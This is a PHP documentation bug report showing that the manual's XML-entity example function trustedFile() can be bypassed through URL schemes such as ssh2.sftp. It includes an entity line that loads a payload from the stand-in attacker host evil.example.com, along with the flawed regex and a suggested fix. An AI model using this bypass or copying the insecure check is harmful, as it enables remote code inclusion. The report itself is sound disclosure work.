Doc #68368 [NEW]: Insecure example
| From: | clicky at erebot dot net | Date: | Thu, 06 Nov 2014 23:33:18 +0000 |
| Subject: | Doc #68368 [NEW]: Insecure example | ||
| Groups: | php.doc.bugs | ||
| Request: | Send a blank email to doc-bugs+get-11612@lists.php.net to get a copy of this message | ||
From: clicky at erebot dot net
Operating system: irrelevant
PHP version: Irrelevant
Package: Documentation problem
Bug Type: Documentation Problem
Bug description:Insecure example
Description:
------------
---
From manual page: http://www.php.net/example.xml-external-entity
---
function trustedFile($file)
{
// only trust local files owned by ourselves
if (!preg_match("@^([a-z]+)\:\/\/@i", $file)
&& fileowner($file) == getmyuid()) {
return true;
}
return false;
}
---
This function is not secure as it does not handle schemes containing
special characters (digits, '+', '.' or '-') in them. In some
circumstances, PHP may define URL wrappers with such names, eg. when the
SSH2 extension is installed.
Test script:
---------------
One way to pass the trustedFile() checks is to load a remote file using
SFTP by replacing the following line in xmltest.xml :
<!ENTITY systemEntity SYSTEM "xmltest2.xml">
with:
<!ENTITY systemEntity SYSTEM
"ssh2.sftp://user:pass@evil.example.com/payload.xml">
Also, since the ssh2.sftp wrapper supports stat() calls, it is possible
to craft a remote file such that its owner UID matches the current
script's owner UID.
Based on RFC 3986, this issue can be trivially fixed by changing the
regex to:
"@^([a-z][a-z0-9+.-]*)\:\/\/@i"
Expected result:
----------------
Even though the code given on that page is only an example, it could be
interpreted as guidance towards secure parsing of XML documents. Plus,
the code specifically says that only local files are "trusted".
I would thus expect it to reject attempts to include and execute code
from remote resources.
Actual result:
--------------
<CHAPTER>
<TITLE>Title &plainEntity;</TITLE>
<PARA>
<INFORMALTABLE>
<TGROUP COLS="3">
<TBODY>
<ROW><ENTRY>a1</ENTRY><ENTRY
MOREROWS="1">b1</ENTRY><ENTRY>c1</ENTRY></ROW>
<ROW><ENTRY>a2</ENTRY><ENTRY>c2</ENTRY></ROW>
<ROW><ENTRY>a3</ENTRY><ENTRY>b3</ENTRY><ENTRY>c3</ENTRY></ROW>
</TBODY>
</TGROUP>
</INFORMALTABLE>
</PARA>
<FOO>
<ELEMENT ATTRIB="value"></ELEMENT>
&testEnt;
This is some more PHP code being executed.
</FOO>
<SECTION ID="about">
<TITLE>About this Document</TITLE>
<PARA>
<!-- this is a comment -->
Hi! This is PHP version 5.4.33
</PARA>
</SECTION>
</CHAPTER>XML error: Invalid URI at line 28
(note: the "XML error" at the end is triggered by the use of a path to a
non-existent DTD in xmltest.xml on line 2 [/just/a/test.dtd] and is not
related to this bug)
--
Edit bug report at https://bugs.php.net/bug.php?id=68368&edit=1
--
Try a snapshot (PHP 5.4): https://bugs.php.net/fix.php?id=68368&r=trysnapshot54
Try a snapshot (PHP 5.5): https://bugs.php.net/fix.php?id=68368&r=trysnapshot55
Try a snapshot (trunk): https://bugs.php.net/fix.php?id=68368&r=trysnapshottrunk
Fixed in SVN: https://bugs.php.net/fix.php?id=68368&r=fixed
Fixed in release: https://bugs.php.net/fix.php?id=68368&r=alreadyfixed
Need backtrace: https://bugs.php.net/fix.php?id=68368&r=needtrace
Need Reproduce Script: https://bugs.php.net/fix.php?id=68368&r=needscript
Try newer version: https://bugs.php.net/fix.php?id=68368&r=oldversion
Not developer issue: https://bugs.php.net/fix.php?id=68368&r=support
Expected behavior: https://bugs.php.net/fix.php?id=68368&r=notwrong
Not enough info: https://bugs.php.net/fix.php?id=68368&r=notenoughinfo
Submitted twice: https://bugs.php.net/fix.php?id=68368&r=submittedtwice
register_globals: https://bugs.php.net/fix.php?id=68368&r=globals
PHP 4 support discontinued: https://bugs.php.net/fix.php?id=68368&r=php4
Daylight Savings: https://bugs.php.net/fix.php?id=68368&r=dst
IIS Stability: https://bugs.php.net/fix.php?id=68368&r=isapi
Install GNU Sed: https://bugs.php.net/fix.php?id=68368&r=gnused
Floating point limitations: https://bugs.php.net/fix.php?id=68368&r=float
No Zend Extensions: https://bugs.php.net/fix.php?id=68368&r=nozend
MySQL Configuration Error: https://bugs.php.net/fix.php?id=68368&r=mysqlcfg